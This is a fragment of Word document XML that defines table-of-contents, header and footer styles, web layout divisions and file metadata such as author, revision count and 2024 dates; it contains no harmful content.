  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005E4D00"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E4D00"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005E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8220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1803229690">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1287812519">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="743142747">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="655650775">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1522474541">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1044519605">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="574902573">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="120097362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 w:id="1145512748">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1832598161">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2010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99AB-8847-D542-9BAB-0E7F265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Xiao Liu</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <cp:lastPrinted>2024-03-29T03:57:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-29T02:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-13T03:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>